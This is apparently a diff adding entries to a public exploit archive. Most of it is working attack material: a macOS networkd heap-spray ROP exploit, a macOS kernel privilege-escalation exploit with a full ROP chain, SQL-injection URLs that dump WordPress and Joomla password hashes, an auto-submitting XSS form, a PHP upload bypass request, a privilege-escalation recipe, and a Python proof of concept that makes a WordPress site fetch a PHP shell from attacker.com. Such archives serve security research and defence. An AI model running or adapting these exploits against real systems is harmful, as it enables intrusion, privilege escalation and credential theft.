const char* image_name = image_infos[i].imageFilePath;
|
||||
mach_vm_address_t image_load_address = (mach_vm_address_t)image_infos[i].imageLoadAddress;
|
||||
if (strstr(image_name, library_name)){
|
||||
return (void*)image_load_address;
|
||||
}
|
||||
}
|
||||
return NULL;
|
||||
}
|
||||
|
||||
|
||||
struct heap_spray {
|
||||
void* fake_objc_class_ptr; // -------+
|
||||
uint8_t pad0[0x10]; // |
|
||||
uint64_t first_gadget; // |
|
||||
uint8_t pad1[0x8]; // |
|
||||
uint64_t null0; // |
|
||||
uint64_t pad3; // |
|
||||
uint64_t pop_rdi_rbp_ret; // |
|
||||
uint64_t rdi; // |
|
||||
uint64_t rbp; // |
|
||||
uint64_t system; // |
|
||||
struct fake_objc_class_t { // |
|
||||
char pad[0x10]; // <----------+
|
||||
void* cache_buckets_ptr; //--------+
|
||||
uint64_t cache_bucket_mask; // |
|
||||
} fake_objc_class; // |
|
||||
struct fake_cache_bucket_t { // |
|
||||
void* cached_sel; // <--------+ //point to the right selector
|
||||
void* cached_function; // will be RIP :)
|
||||
} fake_cache_bucket;
|
||||
char command[256];
|
||||
};
|
||||
|
||||
xpc_connection_t connect(){
|
||||
xpc_connection_t conn = xpc_connection_create_mach_service("com.apple.networkd", NULL, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);
|
||||
|
||||
xpc_connection_set_event_handler(conn, ^(xpc_object_t event) {
|
||||
xpc_type_t t = xpc_get_type(event);
|
||||
if (t == XPC_TYPE_ERROR){
|
||||
printf("err: %s\n", xpc_dictionary_get_string(event, XPC_ERROR_KEY_DESCRIPTION));
|
||||
}
|
||||
printf("received an event\n");
|
||||
});
|
||||
xpc_connection_resume(conn);
|
||||
return conn;
|
||||
}
|
||||
|
||||
void go(){
|
||||
void* heap_spray_target_addr = (void*)0x120202000;
|
||||
struct heap_spray* hs = mmap(heap_spray_target_addr, 0x1000, 3, MAP_ANON|MAP_PRIVATE|MAP_FIXED, 0, 0);
|
||||
memset(hs, 'C', 0x1000);
|
||||
hs->null0 = 0;
|
||||
hs->fake_objc_class_ptr = &hs->fake_objc_class;
|
||||
hs->fake_objc_class.cache_buckets_ptr = &hs->fake_cache_bucket;
|
||||
hs->fake_objc_class.cache_bucket_mask = 0;
|
||||
|
||||
// nasty hack to find the correct selector address :)
|
||||
uint8_t* ptr = (uint8_t*)lorgnette_lookup(mach_task_self(), "_dispatch_objc_release");
|
||||
uint64_t* msgrefs = ptr + 0x1a + (*(int32_t*)(ptr+0x16)); //offset of rip-relative offset of selector
|
||||
uint64_t sel = msgrefs[1];
|
||||
printf("%p\n", sel);
|
||||
hs->fake_cache_bucket.cached_sel = sel;
|
||||
|
||||
uint8_t* CoreFoundation_base = find_library_load_address("CoreFoundation");
|
||||
// pivot:
|
||||
/*
|
||||
push rax
|
||||
add eax, [rax]
|
||||
add [rbx+0x41], bl
|
||||
pop rsp
|
||||
pop r14
|
||||
pop r15
|
||||
pop rbp
|
||||
ret
|
||||
*/
|
||||
hs->fake_cache_bucket.cached_function = CoreFoundation_base + 0x46ef0; //0x414142424343; // ROP from here
|
||||
|
||||
// jump over the NULL then so there's more space:
|
||||
//pop, pop, pop, ret: //and keep stack correctly aligned
|
||||
hs->first_gadget = CoreFoundation_base + 0x46ef7;
|
||||
|
||||
hs->pop_rdi_rbp_ret = CoreFoundation_base + 0x2226;
|
||||
hs->system = dlsym(RTLD_DEFAULT, "system");
|
||||
|
||||
hs->rdi = &hs->command;
|
||||
strcpy(hs->command, "touch /tmp/hello_networkd");
|
||||
|
||||
|
||||
size_t heap_spray_pages = 0x40000;
|
||||
size_t heap_spray_bytes = heap_spray_pages * 0x1000;
|
||||
char* heap_spray_copies = malloc(heap_spray_bytes);
|
||||
for (int i = 0; i < heap_spray_pages; i++){
|
||||
memcpy(heap_spray_copies+(i*0x1000), hs, 0x1000);
|
||||
}
|
||||
|
||||
xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0);
|
||||
|
||||
xpc_dictionary_set_data(msg, "heap_spray", heap_spray_copies, heap_spray_bytes);
|
||||
|
||||
xpc_dictionary_set_uint64(msg, "type", 6);
|
||||
xpc_dictionary_set_uint64(msg, "connection_id", 1);
|
||||
|
||||
xpc_object_t params = xpc_dictionary_create(NULL, NULL, 0);
|
||||
xpc_object_t conn_list = xpc_array_create(NULL, 0);
|
||||
|
||||
xpc_object_t arr_dict = xpc_dictionary_create(NULL, NULL, 0);
|
||||
xpc_dictionary_set_string(arr_dict, "hostname", "example.com");
|
||||
|
||||
xpc_array_append_value(conn_list, arr_dict);
|
||||
xpc_dictionary_set_value(params, "connection_entry_list", conn_list);
|
||||
|
||||
char* long_key = malloc(1024);
|
||||
memset(long_key, 'A', 1023);
|
||||
long_key[1023] = '\x00';
|
||||
|
||||
xpc_dictionary_set_string(params, long_key, "something or other that's not important");
|
||||
|
||||
uint64_t uuid[] = {0, 0x120200000};
|
||||
xpc_dictionary_set_uuid(params, "effective_audit_token", (const unsigned char*)uuid);
|
||||
xpc_dictionary_set_uint64(params, "start", 0);
|
||||
xpc_dictionary_set_uint64(params, "duration", 0);
|
||||
|
||||
xpc_dictionary_set_value(msg, "parameters", params);
|
||||
|
||||
xpc_object_t state = xpc_dictionary_create(NULL, NULL, 0);
|
||||
xpc_dictionary_set_int64(state, "power_slot", 0);
|
||||
xpc_dictionary_set_value(msg, "state", state);
|
||||
|
||||
xpc_object_t conn = connect();
|
||||
printf("connected\n");
|
||||
|
||||
xpc_connection_send_message(conn, msg);
|
||||
printf("enqueued message\n");
|
||||
|
||||
xpc_connection_send_barrier(conn, ^{printf("other side has enqueued this message\n");});
|
||||
|
||||
xpc_release(msg);
|
||||
}
|
||||
|
||||
int main(){
|
||||
go();
|
||||
printf("entering CFRunLoop\n");
|
||||
for(;;){
|
||||
CFRunLoopRunInMode(kCFRunLoopDefaultMode, DBL_MAX, TRUE);
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
323
platforms/osx/local/35848.c
Executable file
323
platforms/osx/local/35848.c
Executable file
|
@ -0,0 +1,323 @@
|
|||
// clang -o ig_2_3_exploit ig_2_3_exploit.c -framework IOKit -framework CoreFoundation -m32 -D_FORTIFY_SOURCE=0
|
||||
// ianbeer
|
||||
#include <stdint.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <sys/mman.h>
|
||||
#include <sys/stat.h>
|
||||
#include <unistd.h>
|
||||
|
||||
#include <CoreFoundation/CoreFoundation.h>
|
||||
#include <IOKit/IOKitLib.h>
|
||||
|
||||
uint64_t kernel_symbol(char* sym){
|
||||
char cmd[1024];
|
||||
strcpy(cmd, "nm -g /mach_kernel | grep ");
|
||||
strcat(cmd, sym);
|
||||
strcat(cmd, " | cut -d' ' -f1");
|
||||
FILE* f = popen(cmd, "r");
|
||||
char offset_str[17];
|
||||
fread(offset_str, 16, 1, f);
|
||||
pclose(f);
|
||||
offset_str[16] = '\x00';
|
||||
|
||||
uint64_t offset = strtoull(offset_str, NULL, 16);
|
||||
return offset;
|
||||
}
|
||||
|
||||
uint64_t leaked_offset_in_kext(){
|
||||
FILE* f = popen("nm -g /System/Library/Extensions/IONDRVSupport.kext/IONDRVSupport | grep __ZTV17IONDRVFramebuffer | cut -d' ' -f1", "r");
|
||||
char offset_str[17];
|
||||
fread(offset_str, 16, 1, f);
|
||||
pclose(f);
|
||||
offset_str[16] = '\x00';
|
||||
|
||||
uint64_t offset = strtoull(offset_str, NULL, 16);
|
||||
offset += 0x10; //offset from symbol to leaked pointer
|
||||
return offset;
|
||||
}
|
||||
|
||||
|
||||
uint64_t leak(){
|
||||
io_iterator_t iter;
|
||||
|
||||
CFTypeRef p = IORegistryEntrySearchCFProperty(IORegistryGetRootEntry(kIOMasterPortDefault),
|
||||
kIOServicePlane,
|
||||
CFSTR("AAPL,iokit-ndrv"),
|
||||
kCFAllocatorDefault,
|
||||
kIORegistryIterateRecursively);
|
||||
|
||||
if (CFGetTypeID(p) != CFDataGetTypeID()){
|
||||
printf("expected CFData\n");
|
||||
return 1;
|
||||
}
|
||||
|
||||
if (CFDataGetLength(p) != 8){
|
||||
printf("expected 8 bytes\n");
|
||||
return 1;
|
||||
}
|
||||
|
||||
uint64_t leaked = *((uint64_t*)CFDataGetBytePtr(p));
|
||||
return leaked;
|
||||
}
|
||||
|
||||
extern CFDictionaryRef OSKextCopyLoadedKextInfo(CFArrayRef, CFArrayRef);
|
||||
|
||||
uint64_t kext_load_addr(char* target_name){
|
||||
uint64_t addr = 0;
|
||||
CFDictionaryRef kd = OSKextCopyLoadedKextInfo(NULL, NULL);
|
||||
CFIndex count = CFDictionaryGetCount(kd);
|
||||
|
||||
void **keys;
|
||||
void **values;
|
||||
|
||||
keys = (void **)malloc(sizeof(void *) * count);
|
||||
values = (void **)malloc(sizeof(void *) * count);
|
||||
|
||||
CFDictionaryGetKeysAndValues(kd,
|
||||
(const void **)keys,
|
||||
(const void **)values);
|
||||
|
||||
for(CFIndex i = 0; i < count; i++){
|
||||
const char *name = CFStringGetCStringPtr(CFDictionaryGetValue(values[i], CFSTR("CFBundleIdentifier")), kCFStringEncodingMacRoman);
|
||||
if (strcmp(name, target_name) == 0){
|
||||
CFNumberGetValue(CFDictionaryGetValue(values[i],
|
||||
CFSTR("OSBundleLoadAddress")),
|
||||
kCFNumberSInt64Type,
|
||||
&addr);
|
||||
printf("%s: 0x%016llx\n", name, addr);
|
||||
break;
|
||||
}
|
||||
}
|
||||
return addr;
|
||||
|
||||
}
|
||||
|
||||
uint64_t load_addr(){
|
||||
uint64_t addr = 0;
|
||||
CFDictionaryRef kd = OSKextCopyLoadedKextInfo(NULL, NULL);
|
||||
CFIndex count = CFDictionaryGetCount(kd);
|
||||
|
||||
void **keys;
|
||||
void **values;
|
||||
|
||||
keys = (void **)malloc(sizeof(void *) * count);
|
||||
values = (void **)malloc(sizeof(void *) * count);
|
||||
|
||||
CFDictionaryGetKeysAndValues(kd,
|
||||
(const void **)keys,
|
||||
(const void **)values);
|
||||
|
||||
for(CFIndex i = 0; i < count; i++){
|
||||
const char *name = CFStringGetCStringPtr(CFDictionaryGetValue(values[i], CFSTR("CFBundleIdentifier")), kCFStringEncodingMacRoman);
|
||||
if (strcmp(name, "com.apple.iokit.IONDRVSupport") == 0){
|
||||
CFNumberGetValue(CFDictionaryGetValue(values[i],
|
||||
CFSTR("OSBundleLoadAddress")),
|
||||
kCFNumberSInt64Type,
|
||||
&addr);
|
||||
printf("%s: 0x%016llx\n", name, addr);
|
||||
break;
|
||||
}
|
||||
}
|
||||
return addr;
|
||||
}
|
||||
|
||||
uint64_t* build_vtable(uint64_t kaslr_slide, size_t* len){
|
||||
uint64_t kernel_base = 0xffffff8000200000;
|
||||
kernel_base += kaslr_slide;
|
||||
|
||||
int fd = open("/mach_kernel", O_RDONLY);
|
||||
if (!fd)
|
||||
return NULL;
|
||||
|
||||
struct stat _stat;
|
||||
fstat(fd, &_stat);
|
||||
size_t buf_len = _stat.st_size;
|
||||
|
||||
uint8_t* buf = mmap(NULL, buf_len, PROT_READ, MAP_FILE|MAP_PRIVATE, fd, 0);
|
||||
|
||||
if (!buf)
|
||||
return NULL;
|
||||
|
||||
/*
|
||||
this stack pivot to rax seems to be reliably present across mavericks versions:
|
||||
push rax
|
||||
add [rax], eax
|
||||
add [rbx+0x41], bl
|
||||
pop rsp
|
||||
pop r14
|
||||
pop r15
|
||||
pop rbp
|
||||
ret
|
||||
*/
|
||||
uint8_t pivot_gadget_bytes[] = {0x50, 0x01, 0x00, 0x00, 0x5b, 0x41, 0x5c, 0x41, 0x5e};
|
||||
uint8_t* pivot_loc = memmem(buf, buf_len, pivot_gadget_bytes, sizeof(pivot_gadget_bytes));
|
||||
uint64_t pivot_gadget_offset = (uint64_t)(pivot_loc - buf);
|
||||
printf("offset of pivot gadget: %p\n", pivot_gadget_offset);
|
||||
uint64_t pivot = kernel_base + pivot_gadget_offset;
|
||||
|
||||
/*
|
||||
pop rdi
|
||||
ret
|
||||
*/
|
||||
uint8_t pop_rdi_ret_gadget_bytes[] = {0x5f, 0xc3};
|
||||
uint8_t* pop_rdi_ret_loc = memmem(buf, buf_len, pop_rdi_ret_gadget_bytes, sizeof(pop_rdi_ret_gadget_bytes));
|
||||
uint64_t pop_rdi_ret_gadget_offset = (uint64_t)(pop_rdi_ret_loc - buf);
|
||||
printf("offset of pop_rdi_ret gadget: %p\n", pop_rdi_ret_gadget_offset);
|
||||
uint64_t pop_rdi_ret = kernel_base + pop_rdi_ret_gadget_offset;
|
||||
|
||||
/*
|
||||
pop rsi
|
||||
ret
|
||||
*/
|
||||
uint8_t pop_rsi_ret_gadget_bytes[] = {0x5e, 0xc3};
|
||||
uint8_t* pop_rsi_ret_loc = memmem(buf, buf_len, pop_rsi_ret_gadget_bytes, sizeof(pop_rsi_ret_gadget_bytes));
|
||||
uint64_t pop_rsi_ret_gadget_offset = (uint64_t)(pop_rsi_ret_loc - buf);
|
||||
printf("offset of pop_rsi_ret gadget: %p\n", pop_rsi_ret_gadget_offset);
|
||||
uint64_t pop_rsi_ret = kernel_base + pop_rsi_ret_gadget_offset;
|
||||
|
||||
/*
|
||||
pop rdx
|
||||
ret
|
||||
*/
|
||||
uint8_t pop_rdx_ret_gadget_bytes[] = {0x5a, 0xc3};
|
||||
uint8_t* pop_rdx_ret_loc = memmem(buf, buf_len, pop_rdx_ret_gadget_bytes, sizeof(pop_rdx_ret_gadget_bytes));
|
||||
uint64_t pop_rdx_ret_gadget_offset = (uint64_t)(pop_rdx_ret_loc - buf);
|
||||
printf("offset of pop_rdx_ret gadget: %p\n", pop_rdx_ret_gadget_offset);
|
||||
uint64_t pop_rdx_ret = kernel_base + pop_rdx_ret_gadget_offset;
|
||||
|
||||
munmap(buf, buf_len);
|
||||
close(fd);
|
||||
|
||||
|
||||
/*
|
||||
in IOAcceleratorFamily2
|
||||
two locks are held - r12 survives the pivot, this should unlock all the locks from there:
|
||||
__text:0000000000006F80 lea rsi, unk_32223
|
||||
__text:0000000000006F87 mov rbx, [r12+118h]
|
||||
__text:0000000000006F8F mov rax, [rbx]
|
||||
__text:0000000000006F92 mov rdi, rbx
|
||||
__text:0000000000006F95 xor edx, edx
|
||||
__text:0000000000006F97 call qword ptr [rax+858h]
|
||||
__text:0000000000006F9D mov rdi, rbx ; this
|
||||
__text:0000000000006FA0 call __ZN22IOGraphicsAccelerator211unlock_busyEv ; IOGraphicsAccelerator2::unlock_busy(void)
|
||||
__text:0000000000006FA5 mov rdi, [rbx+88h]
|
||||
__text:0000000000006FAC call _IOLockUnlock
|
||||
__text:0000000000006FB1
|
||||
__text:0000000000006FB1 loc_6FB1: ; CODE XREF: IOAccelContext2::clientMemoryForType(uint,uint *,IOMemoryDescriptor **)+650j
|
||||
__text:0000000000006FB1 xor ecx, ecx
|
||||
__text:0000000000006FB3 jmp loc_68BC
|
||||
...
|
||||
__text:00000000000068BC mov eax, ecx ; jumptable 00000000000067F1 default case
|
||||
__text:00000000000068BE add rsp, 38h
|
||||
__text:00000000000068C2 pop rbx
|
||||
__text:00000000000068C3 pop r12
|
||||
__text:00000000000068C5 pop r13
|
||||
__text:00000000000068C7 pop r14
|
||||
__text:00000000000068C9 pop r15
|
||||
__text:00000000000068CB pop rbp
|
||||
__text:00000000000068CC retn
|
||||
*/
|
||||
uint64_t unlock_locks = kext_load_addr("com.apple.iokit.IOAcceleratorFamily2") + kaslr_slide + 0x6f80;
|
||||
|
||||
printf("0x%016llx\n", unlock_locks);
|
||||
|
||||
uint64_t KUNCExecute = kernel_symbol("_KUNCExecute") + kaslr_slide;
|
||||
uint64_t thread_exception_return = kernel_symbol("_thread_exception_return") + kaslr_slide;
|
||||
|
||||
//char* payload = "/Applications/Calculator.app/Contents/MacOS/Calculator";
|
||||
char* payload = "/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal";
|
||||
|
||||
uint64_t rop_stack[] = {
|
||||
0, //pop r14
|
||||
0, //pop r15
|
||||
0, //pop rbp +10
|
||||
unlock_locks,
|
||||
pivot, //+20 virtual call is rax+20
|
||||
0, //+10
|
||||
0, //+18
|
||||
0,
|
||||
0, //+28
|
||||
0,
|
||||
0, //+38
|
||||
0, //pop rbx
|
||||
0, //pop r12
|
||||
0, //pop r13
|
||||
0, //pop r14
|
||||
0, //pop r15
|
||||
0, //pop rbp
|
||||
pop_rdi_ret,
|
||||
(uint64_t)payload,
|
||||
pop_rsi_ret,
|
||||
0,
|
||||
pop_rdx_ret,
|
||||
0,
|
||||
KUNCExecute,
|
||||
thread_exception_return
|
||||
};
|
||||
|
||||
uint64_t* r = malloc(sizeof(rop_stack));
|
||||
memcpy(r, rop_stack, sizeof(rop_stack));
|
||||
*len = sizeof(rop_stack);
|
||||
return r;
|
||||
}
|
||||
|
||||
void trigger(void* vtable, size_t vtable_len){
|
||||
//need to overallocate and touch the pages since this will be the stack:
|
||||
mach_vm_address_t addr = 0x41420000 - 10 * 0x1000;
|
||||
mach_vm_allocate(mach_task_self(), &addr, 0x20*0x1000, 0);
|
||||
|
||||
memset(addr, 0, 0x20*0x1000);
|
||||
memcpy((void*)0x41420000, vtable, vtable_len);
|
||||
|
||||
//map NULL page
|
||||
vm_deallocate(mach_task_self(), 0x0, 0x1000);
|
||||
addr = 0;
|
||||
vm_allocate(mach_task_self(), &addr, 0x1000, 0);
|
||||
char* np = 0;
|
||||
for (int i = 0; i < 0x1000; i++){
|
||||
np[i] = 'A';
|
||||
}
|
||||
|
||||
volatile uint64_t* zero = 0;
|
||||
*zero = 0x41420000;
|
||||
|
||||
//trigger vuln
|
||||
CFMutableDictionaryRef matching = IOServiceMatching("IntelAccelerator");
|
||||
io_iterator_t iterator;
|
||||
kern_return_t err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator);
|
||||
|
||||
io_service_t service = IOIteratorNext(iterator);
|
||||
io_connect_t conn = MACH_PORT_NULL;
|
||||
err = IOServiceOpen(service, mach_task_self(), 2, &conn);
|
||||
|
||||
addr = 0x12345000;
|
||||
mach_vm_size_t size = 0x1000;
|
||||
|
||||
err = IOConnectMapMemory(conn, 3, mach_task_self(), &addr, &size, kIOMapAnywhere);
|
||||
}
|
||||
|
||||
int main() {
|
||||
uint64_t leaked_ptr = leak();
|
||||
uint64_t kext_load_addr = load_addr();
|
||||
|
||||
// get the offset of that pointer in the kext:
|
||||
uint64_t offset = leaked_offset_in_kext();
|
||||
|
||||
// sanity check the leaked address against the symbol addr:
|
||||
if ( (leaked_ptr & 0xfff) != (offset & 0xfff) ){
|
||||
printf("the leaked pointer doesn't match up with the expected symbol offset\n");
|
||||
return 1;
|
||||
}
|
||||
|
||||
uint64_t kaslr_slide = (leaked_ptr - offset) - kext_load_addr;
|
||||
|
||||
printf("kaslr slide: %p\n", kaslr_slide);
|
||||
|
||||
size_t vtable_len = 0;
|
||||
void* vtable = build_vtable(kaslr_slide, &vtable_len);
|
||||
|
||||
trigger(vtable, vtable_len);
|
||||
|
||||
return 0;
|
||||
}
|
41
platforms/php/remote/35855.txt
Executable file
41
platforms/php/remote/35855.txt
Executable file
|
@ -0,0 +1,41 @@
|
|||
source: http://www.securityfocus.com/bid/48259/info
|
||||
|
||||
PHP is prone to a security-bypass vulnerability.
|
||||
|
||||
Successful exploits will allow an attacker to create arbitrary files from the root directory, which may aid in further attacks.
|
||||
|
||||
PHP 5.3.6 is vulnerable; other versions may also be affected.
|
||||
|
||||
HTTP Request:
|
||||
====
|
||||
POST /file-upload-fuzz/recv_dump.php HTTP/1.0
|
||||
host: blog.security.localhost
|
||||
content-type: multipart/form-data; boundary=----------ThIs_Is_tHe_bouNdaRY_$
|
||||
content-length: 200
|
||||
|
||||
------------ThIs_Is_tHe_bouNdaRY_$
|
||||
Content-Disposition: form-data; name="contents"; filename="/anything.here.slash-will-pass";
|
||||
Content-Type: text/plain
|
||||
|
||||
any
|
||||
------------ThIs_Is_tHe_bouNdaRY_$--
|
||||
|
||||
HTTP Response:
|
||||
====
|
||||
HTTP/1.1 200 OK
|
||||
Date: Fri, 27 May 2011 11:35:08 GMT
|
||||
Server: Apache/2.2.14 (Ubuntu)
|
||||
X-Powered-By: PHP/5.3.2-1ubuntu4.9
|
||||
Content-Length: 30
|
||||
Connection: close
|
||||
Content-Type: text/html
|
||||
|
||||
/anything.here.slash-will-pass
|
||||
|
||||
PHP script:
|
||||
=====
|
||||
<?php
|
||||
if (!empty($_FILES['contents'])) { // process file upload
|
||||
echo $_FILES['contents']['name'];
|
||||
unlink($_FILES['contents']['tmp_name']);
|
||||
}
|
8
platforms/php/webapps/35835.txt
Executable file
8
platforms/php/webapps/35835.txt
Executable file
|
@ -0,0 +1,8 @@
|
|||
source: http://www.securityfocus.com/bid/48166/info
|
||||
|
||||
The GD Star Rating plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/wp-content/plugins/gd-star-rating/ajax.php?_wpnonce=<insert_valid_nonce>&vote_type=cache&vote_domain=a&votes=asr.1.xxx.1.2.5+limit+0+union+select+1,0x535242,1,1,co
|
||||
ncat(0x613a313a7b733a363a226e6f726d616c223b733a323030303a22,substring(concat((select+concat(user_nicename,0x3a,user_email,0x3a,user_login,0x3a,user_pass)+from+wp_users+where+length(user_pass)%3E0+order+by+id+limit+0,1),repeat(0x20,2000)),1,2000),0x223b7d),1,1,1+limit+1
|
22
platforms/php/webapps/35837.html
Executable file
22
platforms/php/webapps/35837.html
Executable file
|
@ -0,0 +1,22 @@
|
|||
source: http://www.securityfocus.com/bid/48215/info
|
||||
|
||||
|
||||
The Pacer Edition CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
The Pacer Edition CMS RC 2.1 is vulnerable; prior versions may also be affected.
|
||||
|
||||
<html>
|
||||
<title>Pacer Edition CMS 2.1 Remote XSS POST Injection Vulnerability</title>
|
||||
<body bgcolor="#1C1C1C">
|
||||
<script type="text/javascript">function xss1(){document.forms["xss"].submit();}</script>
|
||||
<form action="http://www.example.com/admin/login/forgot/index.php" enctype="application/x-www-form-urlencoded" method="POST" id="xss">
|
||||
<input type="hidden" name="url" value="1" />
|
||||
<input type="hidden" name="email" value='%F6"+onmouseover=prompt(31337)' />
|
||||
<input type="hidden" name="button" value="Send%20Details" />
|
||||
</form>
|
||||
<a href="javascript: xss1();" style="text-decoration:none">
|
||||
<b><font color="red"><center><h3><br /><br />Exploit!<h3></center></font></b></a>
|
||||
</body>
|
||||
</html>
|
7
platforms/php/webapps/35838.txt
Executable file
7
platforms/php/webapps/35838.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/48217/info
|
||||
|
||||
Tolinet Agencia is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
|
||||
|
||||
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/index.php?tip=art&id=2' <- blind sql
|
9
platforms/php/webapps/35839.txt
Executable file
9
platforms/php/webapps/35839.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/48223/info
|
||||
|
||||
Joomla Minitek FAQ Book is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
|
||||
|
||||
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
|
||||
|
||||
Joomla Minitek FAQ Book 1.3 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/demo16/faq-book?view=category&id=-7+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+jos_users--
|
62
platforms/php/webapps/35840.txt
Executable file
62
platforms/php/webapps/35840.txt
Executable file
|
@ -0,0 +1,62 @@
|
|||
???# Exploit Title: Privilege Escalation in RedaxScript 2.1.0
|
||||
# Date: 11-05-2014
|
||||
# Exploit Author: shyamkumar somana
|
||||
# Vendor Homepage: http://redaxscript.com/
|
||||
# Version: 2.1.0
|
||||
# Tested on: Windows 8
|
||||
|
||||
#Privilege Escalation in RedaxScript 2.1.0
|
||||
|
||||
|
||||
RedaxScript 2.1.0 suffers from a privilege Escalation vulnerability. The
|
||||
issue occurs because the application fails to properly implement access
|
||||
controls. The application also fails to perform proper sanity checks on the
|
||||
user supplied input before processing it. These two flaws led to a
|
||||
vertical privilege escalation. This can be achieved by a simply tampering
|
||||
the parameter values. An attacker can exploit this issue to gain elevated
|
||||
privileges to the application.
|
||||
|
||||
*Steps to reproduce the instance:*
|
||||
|
||||
· login as a non admin user
|
||||
|
||||
· Go to account and update the account.
|
||||
|
||||
· intercept the request and add “*groups[]=1*” to the post data and
|
||||
submit the request
|
||||
|
||||
· Log out of the application and log in again. You can now browse
|
||||
the application with admin privileges.
|
||||
|
||||
This vulnerability was addressed in the following commit.
|
||||
|
||||
https://github.com/redaxmedia/redaxscript/commit/bfe146f98aedb9d169ae092b49991ed1b3bc0860?diff=unified
|
||||
|
||||
|
||||
*Timeline*:
|
||||
|
||||
09-26-2014: Issue identified
|
||||
|
||||
09-27-2014: Discussion with the vendor
|
||||
|
||||
10-27-2014: Issue confirmed
|
||||
|
||||
11-05-2014: Patch released.
|
||||
|
||||
|
||||
|
||||
|
||||
Author: Shyamkumar Somana
|
||||
Vendor Homepage: http://redaxscript.com/download
|
||||
Version: 2.1.0
|
||||
Tested on: Windows 7
|
||||
|
||||
--
|
||||
|
||||
[image: --]
|
||||
shyam kumar
|
||||
[image: http://]about.me/shyamkumar.somana
|
||||
<http://about.me/shyamkumar.somana?promo=email_sig>
|
||||
|
||||
Shyamkumar Somana | +91 89513 38625 | twitter.com/0xshyam |
|
||||
in.linkedin.com/in/sshyamkumar/ |
|
118
platforms/php/webapps/35846.txt
Executable file
118
platforms/php/webapps/35846.txt
Executable file
|
@ -0,0 +1,118 @@
|
|||
Mogwai Security Advisory MSA-2015-01
|
||||
----------------------------------------------------------------------
|
||||
Title: WP Pixarbay Images Multiple Vulnerabilities
|
||||
Product: Pixarbay Images (Wordpress Plugin)
|
||||
Affected versions: 2.3
|
||||
Impact: high
|
||||
Remote: yes
|
||||
Product link: https://wordpress.org/plugins/pixabay-images/
|
||||
Reported: 14/01/2015
|
||||
by: Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench)
|
||||
|
||||
|
||||
Vendor's Description of the Software:
|
||||
----------------------------------------------------------------------
|
||||
Pixabay Images is a WordPress plugin that let's you pick CC0 public
|
||||
domain pictures from Pixabay and insert them with just a click anywhere
|
||||
on your blog. The images are safe to use, and paying attribution or
|
||||
linking back to the source is not required.
|
||||
|
||||
|
||||
Business recommendation:
|
||||
----------------------------------------------------------------------
|
||||
Update to version 2.4
|
||||
|
||||
Vulnerability description:
|
||||
----------------------------------------------------------------------
|
||||
1) Authentication bypass
|
||||
The plugin does not correctly check if the user is logged in. Certain
|
||||
code can be called without authentication
|
||||
|
||||
2) Arbitrary file upload
|
||||
The plugin code does not validate the host in the provided download URL,
|
||||
which allows to upload malicious files, including PHP code.
|
||||
|
||||
3) Path Traversal
|
||||
Certain values are not sanitized before they are used in a file operation.
|
||||
This allows to store files outside of the "download" folder.
|
||||
|
||||
4) Cross Site Scripting (XSS)
|
||||
The generated author link uses unsanitized user values which can be
|
||||
abused for Cross Site Scripting (XSS) attacks.
|
||||
|
||||
|
||||
Proof of concept:
|
||||
----------------------------------------------------------------------
|
||||
The following PoC Python script can be used to download PHP files from
|
||||
a attacker controlled host.
|
||||
|
||||
#!/usr/bin/env python
|
||||
|
||||
import argparse
|
||||
import httplib, urllib
|
||||
from urlparse import urlparse
|
||||
|
||||
def exploit(target_url, shellcode_url):
|
||||
|
||||
target = urlparse(target_url)
|
||||
|
||||
params = urllib.urlencode({'pixabay_upload': 1, 'image_url': shellcode_url,
|
||||
'image_user': 'none', 'q':'xxx/../../../../../../mogwai'})
|
||||
headers = headers = {"Content-type": "application/x-www-form-urlencoded"}
|
||||
|
||||
print "[+] Sending download request...."
|
||||
conn = httplib.HTTPConnection(target.netloc)
|
||||
conn.request("POST", target.path + "/wp-admin/", params, headers)
|
||||
|
||||
response = conn.getresponse()
|
||||
response_data = response.read()
|
||||
if response.status != 200 and response_data != "Error: File attachment metadata
|
||||
error":
|
||||
print "[-] Something went wrong"
|
||||
print response_data
|
||||
exit()
|
||||
|
||||
conn.close()
|
||||
|
||||
|
||||
# ---- Main code ----------------
|
||||
parser = argparse.ArgumentParser()
|
||||
parser.add_argument("target_url", help="The target url, for example
|
||||
http://foo.bar/blog/")
|
||||
parser.add_argument("shellcode_url", help="The url of the PHP file that should
|
||||
be uploaded, for example: http://attacker.com/shell.php")
|
||||
|
||||
print "----------------------------------------------"
|
||||
print " pixabay upload wordpress plugin exploit PoC"
|
||||
print " Mogwai security"
|
||||
print "----------------------------------------------"
|
||||
|
||||
arguments = parser.parse_args()
|
||||
exploit(arguments.target_url, arguments.shellcode_url)
|
||||
|
||||
|
||||
|
||||
|
||||
Vulnerable / tested versions:
|
||||
----------------------------------------------------------------------
|
||||
Pixabay Images 2.3
|
||||
|
||||
|
||||
Disclosure timeline:
|
||||
----------------------------------------------------------------------
|
||||
14/01/2014: Reporting issues to the plugin author
|
||||
15/01/2014: Release of fixed version (2.4)
|
||||
19/01/2014: Public advisory
